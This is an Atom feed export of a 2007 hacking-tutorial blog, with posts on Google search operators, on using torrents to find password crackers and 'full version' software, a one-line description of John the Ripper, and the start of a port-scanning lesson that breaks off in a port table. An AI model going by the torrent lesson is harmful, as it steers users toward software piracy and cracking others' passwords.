&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;pre  style="text-align: justify;font-family:trebuchet ms;"&gt;&lt;span style="font-size:100%;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;b&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;i&lt;span class="docmonofont"&gt;ntitle:&lt;/span&gt; &lt;/span&gt;&lt;/b&gt;Restricts the search to the TITLES of web pages.&lt;br /&gt;&lt;/span&gt;&lt;/pre&gt;  &lt;/div&gt;&lt;p  style="text-align: justify;font-family:trebuchet ms;" class="MsoNormal"&gt; &lt;span style="font-size:100%;"&gt;&lt;b&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;allintitle: &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt;Restricts the search to pages where all&lt;/span&gt;&lt;span style="font-size:100%;"&gt; specified words make up the title of the web page. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;    &lt;/div&gt;&lt;p  style="text-align: justify;font-family:trebuchet ms;" class="MsoNormal"&gt;&lt;span class="docmonofont"  style="font-size:100%;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;b style=""&gt;&lt;span style="color:blue;"&gt;inurl:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt; Restricts&lt;a name="IXT-1-244"&gt;&lt;/a&gt;&lt;a name="IXT-1-245"&gt;&lt;/a&gt; your search to the URLs of web pages. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;    &lt;/div&gt;&lt;p  style="text-align: justify;font-family:trebuchet ms;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;b style=""&gt;&lt;span style="color:blue;"&gt;allinurl:&lt;/span&gt;&lt;/b&gt; &lt;/span&gt;&lt;span style="font-size:100%;"&gt;Restricts the search to pages where all&lt;/span&gt;&lt;span style="font-size:100%;"&gt; specified words make up the URL of the web page.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;    &lt;/div&gt;&lt;p  style="text-align: justify;font-family:trebuchet ms;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;b style=""&gt;&lt;span style="color:blue;"&gt;intext:&lt;/span&gt;&lt;/b&gt; Searches&lt;a name="IXT-1-246"&gt;&lt;/a&gt;&lt;a name="IXT-1-247"&gt;&lt;/a&gt; only body text (i.e., ignores link text, URLs, and titles). &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;    &lt;/div&gt;&lt;p  style="text-align: justify;font-family:arial;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;b style=""&gt;&lt;span style="color:blue;"&gt;allintext: &lt;/span&gt;&lt;/b&gt;Searches for&lt;/span&gt;&lt;span style="font-size:100%;"&gt; all&lt;/span&gt;&lt;span style="font-size:100%;"&gt; specified words in the body of text &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p  style="text-align: justify;font-family:trebuchet ms;" class="doclist"&gt;&lt;span style="font-size:100%;"&gt;&lt;b style=""&gt;&lt;span style="color:blue;"&gt;inanchor:&lt;/span&gt;&lt;/b&gt; Searches&lt;a name="IXT-1-248"&gt;&lt;/a&gt;&lt;a name="IXT-1-249"&gt;&lt;/a&gt; for text in a page's link anchors. A link anchor is the descriptive text of a link. &lt;/span&gt;&lt;span style="font-size:100%;"&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p  style="text-align: justify;font-family:arial;" class="MsoNormal"&gt;&lt;span class="docmonofont"  style="font-size:100%;"&gt;&lt;b style=""&gt;&lt;span style="color:blue;"&gt;site:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;b style=""&gt;&lt;span style="color:blue;"&gt; &lt;/span&gt;&lt;/b&gt;&lt;a name="IXT-1-250"&gt;&lt;/a&gt;&lt;a name="IXT-1-251"&gt;&lt;/a&gt;Searches for the exact site. &lt;/span&gt;&lt;span style="color: rgb(51, 51, 255);font-size:100%;" &gt;E.g.:&lt;/span&gt;&lt;span style="font-size:100%;"&gt; site: hackingme.blogspot.com&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;    &lt;/div&gt;&lt;p  style="text-align: justify;font-family:arial;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;span class="docmonofont"  style="font-size:100%;"&gt;&lt;b style=""&gt;&lt;span style="color:blue;"&gt;link:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;b style=""&gt;&lt;span style="color:blue;"&gt; &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;R&lt;/span&gt;&lt;span style="font-size:100%;"&gt;eturns&lt;a name="IXT-1-252"&gt;&lt;/a&gt;&lt;a name="IXT-1-253"&gt;&lt;/a&gt; a list of pages linked to the specified url.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;    &lt;/div&gt;&lt;p  style="text-align: justify;font-family:arial;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;b style=""&gt;&lt;span style="color:blue;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;span class="docmonofont"&gt;cache:&lt;/span&gt; &lt;/span&gt;&lt;/b&gt;Finds&lt;a name="IXT-1-254"&gt;&lt;/a&gt;&lt;a name="IXT-1-255"&gt;&lt;/a&gt; a copy of the page that G indexed, even if that page is no longer exists. This type of search is necessary for pages that change often. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;    &lt;/div&gt;&lt;p  style="text-align: justify;font-family:arial;" class="MsoNormal"&gt;&lt;span class="docmonofont"  style="font-size:100%;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;b style=""&gt;&lt;span style="color:blue;"&gt;daterange:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt; Restricts &lt;a name="IXT-1-256"&gt;&lt;/a&gt;&lt;a name="IXT-1-257"&gt;&lt;/a&gt;your search to a particular date or range of dates that a page was indexed. Works perfect &lt;a name="IXT-1-258"&gt;&lt;/a&gt;&lt;a name="IXT-1-259"&gt;&lt;/a&gt;with Julian and not &lt;a name="IXT-1-260"&gt;&lt;/a&gt;Gregorian dates (the calendar we use every day.) The Gregorian/Julian converters are available online.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;pre  style="text-align: justify;font-family:trebuchet ms;"&gt;&lt;span style="font-size:100%;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;b style=""&gt;&lt;span style="color:blue;"&gt;&lt;span class="docmonofont"&gt;filetype:&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt; Searches&lt;a name="IXT-1-261"&gt;&lt;/a&gt;&lt;a name="IXT-1-262"&gt;&lt;/a&gt; the suffixes or filename extensions.&lt;span style="color: rgb(51, 51, 255);"&gt;&lt;br /&gt;E.g.:&lt;/span&gt; hacking black book.pdf, hacking black book.doc, etc.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/pre&gt;    &lt;/div&gt;&lt;p  style="text-align: justify;font-family:arial;" class="MsoNormal"&gt;&lt;span class="docmonofont"  style="font-size:100%;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;b style=""&gt;&lt;span style="color:blue;"&gt;related:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt; Finds&lt;a name="IXT-1-267"&gt;&lt;/a&gt;&lt;a name="IXT-1-268"&gt;&lt;/a&gt; pages that are related to the specified page. &lt;/span&gt;&lt;span style="color: rgb(51, 51, 255);font-size:100%;" &gt;E.g.:&lt;/span&gt;&lt;span style="font-size:100%;"&gt; related: google.com&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p  style="text-align: justify;font-family:trebuchet ms;" class="doclist"&gt;&lt;span style="font-size:100%;"&gt;&lt;b style=""&gt;&lt;span style="color:blue;"&gt;info:&lt;/span&gt;&lt;/b&gt; Provides&lt;a name="IXT-1-269"&gt;&lt;/a&gt;&lt;a name="IXT-1-270"&gt;&lt;/a&gt; a page of links to more information about a specified URL... &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p  style="text-align: justify;font-family:trebuchet ms;" class="doctext"&gt;&lt;span class="docmonofont"  style="font-size:100%;"&gt;&lt;b style=""&gt;&lt;span style="color:blue;"&gt;phonebook:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt; Looks up&lt;a name="IXT-1-271"&gt;&lt;/a&gt;&lt;a name="IXT-1-272"&gt;&lt;/a&gt; phone numbers. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-2478287023780592521?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/2478287023780592521/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=2478287023780592521' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/2478287023780592521'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/2478287023780592521'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/searching-search-engine.html' title='SEARCHING SEARCH ENGINE (Lesson 1)'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-6632665557355893147</id><published>2007-04-04T21:02:00.000+05:30</published><updated>2007-05-06T21:52:49.094+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Search Engine'/><title type='text'>TORRENTS - A POWERFUL SEARCH ENGINE (Lesson 2)</title><content type='html'>&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;Searching password cracker’s or full version of software’s is a bit difficult when a person is using a search engine like google, altavista, etc. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;For e.g.:&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt; If a person is searching for a password cracker that can crack Microsoft office password’s on a search engine, then the initial few sites that he would get are the companies that spends lot of money on SEO (Search Engine Optimization) and their target segment is not a hacker. These websites are looking for people or companies which actually pay for there software’s and hence these are not our target sites as well.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;Make a note of one point that NO SEARCH ENGINE IS PERFECT, though they can provide you with good result 80% of time but still there is a gap of 20% and from a hacker’s point of view these 20% are most important. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;So where a &lt;b style=""&gt;SEARCH ENGINE&lt;/b&gt; fails &lt;b style=""&gt;TORRENT’S&lt;/b&gt; pass. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;      &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;span style=";font-family:Arial;font-size:14;"  &gt;&lt;span style="color: rgb(51, 51, 255);"&gt;What are Torrents?&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;When you browse the web, the pages you look have to be downloaded to your computer. This transferring of web pages to your computer relies on the Hyper Text Transfer Protocol (HTTP - just a standard way of transferring web pages to your computer).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;Another Protocol is File Transfer Protocol (FTP - a standard way to transfer files between computers).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;There are different browsers which are HTTP compliant such as - Internet Explorer, Netscape, Firefox, etc. The same holds true for torrents and hence there are many different programs that are "Torrent Compliant", which means they will be able to connect and transfer files using the Torrent method. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;So in case of torrents there are two things a TORRENT PROGRAM and a TORRENT FILE. A Torrent file just contains a bunch of information that define where to connect (the system address), what to download, etc.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;Some of the torrents program available free of cost on net are - BIT TORRENT, AZUREUS, etc.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p style="text-align: justify;"&gt;&lt;span style=";font-family:Arial;font-size:14;"  &gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;How to use a Torrent?&lt;/span&gt; &lt;/span&gt;&lt;span style="font-family:Arial;"&gt;(The process is very much similar to that of a Download Manager program)&lt;/span&gt;&lt;span style=";font-family:Arial;font-size:14;"  &gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;span style=";font-family:Arial;font-size:14;"  &gt;Steps involved-&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;1). Download the torrent program from internet.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;2). Install it on your system.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;3). Search for the torrent file.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;- Either on a normal search engine – google, altavista, etc.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;- Or on a torrent search engine such as isohunt, demonoid, etc.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;The size of a torrent file is in KB’s so not a big deal to download. Once you have downloaded the torrent file just click on it, it will automatically open in the torrent program or choose from the “open with” option to open it in the torrent program on your system.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;Rest is like download manager. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;span style="font-family:Arial;"&gt;E.g&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt;.:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;-I want to download Microsoft office password cracker. I tried google but couldn’t get the full version. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;-I downloaded a program called AZUREUS, then I downloaded the additional software required to run it which is a java client.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;-I opened a torrent search engine and typed Microsoft office password cracker. I got around 100 results. But what the hell is this “S” and “L” written in front of every result.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;span style=""&gt;          &lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;&gt;&lt;b style=""&gt;S&lt;/b&gt; is a seed which in turn is a computer that has a complete file available for other computers to download (so the torrent file with maximum number of seeds is the best file to download)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;span style="color: rgb(51, 102, 255);font-family:Arial;" &gt;&lt;span style=""&gt;                &lt;/span&gt;&gt;&lt;b style=""&gt;L &lt;/b&gt;is leeching which specifies the number of users who are currently downloading the file.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;-I downloaded the file with maximum number of seeds but it took only 2 secs whereas the file size mentioned was 5 MB.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;&gt;The file size mentioned was the original file size of the password cracker. The size of a torrent file will never be more than a few KB.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;-I clicked on the torrent file and it automatically opened in the program. I then specified the directory path where I want to download the password cracker and the download starts instantaneously. If I switch off the system and then again switch it on the download will start from the same point where it stopped.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;Torrent method can generate unexpected results provided you must have your own personal computer with a good connection speed.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-6632665557355893147?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/6632665557355893147/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=6632665557355893147' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/6632665557355893147'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/6632665557355893147'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/torrents-powerful-search-engine.html' title='TORRENTS - A POWERFUL SEARCH ENGINE (Lesson 2)'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-2839280381272773264</id><published>2007-04-04T15:19:00.000+05:30</published><updated>2007-04-26T15:25:57.714+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tool of the day'/><title type='text'>John the Ripper</title><content type='html'>&lt;strong&gt;&lt;/strong&gt;&lt;span style="font-weight: bold; color: rgb(51, 51, 255);"&gt;John the Ripper&lt;/span&gt; is another fast password cracker available for Unix, DOS, Win32, etc.. Its primary purpose is to detect weak Unix passwords.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-2839280381272773264?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/2839280381272773264/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=2839280381272773264' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/2839280381272773264'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/2839280381272773264'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/security-hacking-tool-of-day-4th-april_04.html' title='John the Ripper'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-4836893027781761574</id><published>2007-04-03T21:13:00.000+05:30</published><updated>2007-05-06T21:55:55.199+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Breaking Security'/><title type='text'>PORT SCANNING (Lesson 5)</title><content type='html'>&lt;h2 style="text-align: justify;"&gt;&lt;a name="ch11"&gt;&lt;/a&gt;&lt;a name="328"&gt;&lt;/a&gt;&lt;a name="ch11lev1sec2"&gt;&lt;/a&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h2&gt;&lt;p class="first-para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;Every computer connected on internet has a unique Internet Protocol (IP) address that identifies them over the Internet. Hackers use a hacking tool called a &lt;i&gt;&lt;a href="mk:@MSITStore:C:%5CDocuments%20and%20Settings%5CAbhishekS%5CMy%20Documents%5CMonu%5CSteal%20This%20Computer%20Book%203%20What%20They%20Won%27t%20Tell%20You%20About%20the%20Internet.CHM::/6097final/LiB0220.html#924" target="_parent"&gt;&lt;span style="color: rgb(0, 0, 0); text-decoration: none;"&gt;scanner&lt;/span&gt;&lt;/a&gt;&lt;a name="329"&gt;&lt;/a&gt;&lt;a name="ch11fig02"&gt;&lt;/a&gt; to&lt;/i&gt;&lt;span class="figure-title"&gt; search for a range of IP addresses for a computer to attack.&lt;/span&gt; &lt;a name="330"&gt;&lt;/a&gt;&lt;a name="page138"&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="first-para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;When the scanner finds a computer at a particular IP address, it then examines the ports on that computer to see which ones could be exploited.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="first-para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;A port represents a specific way for a computer to communicate over the Internet. When a computer connects to the Internet, it needs to know when it's receiving email and when it's accessing a web page. Since information from the Internet flows into the computer through the same physical connection (a telephone line or cable modem), computers create separate ports to accept certain data. This way the computer knows how to handle data.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;Each port is assigned a number and every computer connected to the Internet uses ports, which means that ports open up a door that hackers can use to access a computer. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;table class="MsoNormalTable" style="margin-left: 6.75pt; margin-right: 6.75pt;" align="left" border="0" cellpadding="0"&gt;&lt;thead&gt;&lt;tr&gt;&lt;td style="padding: 0.75pt;" valign="top"&gt;&lt;p class="table-para" style="text-align: justify;"&gt;&lt;b&gt;&lt;span style="font-family:Arial;"&gt;SERVICE&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;/td&gt;&lt;td style="padding: 0.75pt;" valign="top"&gt;&lt;p class="table-para" style="text-align: justify;"&gt;&lt;b&gt;&lt;span style="font-family:Arial;"&gt;PORT&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="padding: 0.75pt;" colspan="2"&gt;&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="padding: 0.75pt;" valign="top"&gt;&lt;p class="table-para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;File Transfer Protocol (FTP)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;/td&gt;&lt;td style="padding: 0.75pt;" valign="top"&gt;&lt;p class="table-para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;21&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="padding: 0.75pt;" valign="top"&gt;&lt;p class="table-para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;Telnet&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;/td&gt;&lt;td style="padding: 0.75pt;" valign="top"&gt;&lt;p class="table-para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;23&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="padding: 0.75pt;" valign="top"&gt;&lt;p class="table-para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;Simple Mail Transfer Protocol (SMTP)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;/td&gt;&lt;td style="padding: 0.75pt;" valign="top"&gt;&lt;p class="table-para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;25&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="padding: 0.75pt;" valign="top"&gt;&lt;p class="table-para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;Gopher&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;/td&gt;&lt;td style="padding: 0.75pt;" valign="top"&gt;&lt;p class="table-para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;70&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="padding: 0.75pt;" valign="top"&gt;&lt;p class="table-para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;Finger&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;/td&gt;&lt;td style="padding: 0.75pt;" valign="top"&gt;&lt;p class="table-para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;79&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="padding: 0.75pt;" valign="top"&gt;&lt;p class="table-para" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;Hypertext Transfer Protocol (HTTP)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;/td&gt;&lt;td style="padding: 0.75pt;" valign="top"&gt;&lt;p class="table-para" style="text-align: justify;"&gt;&lt;span 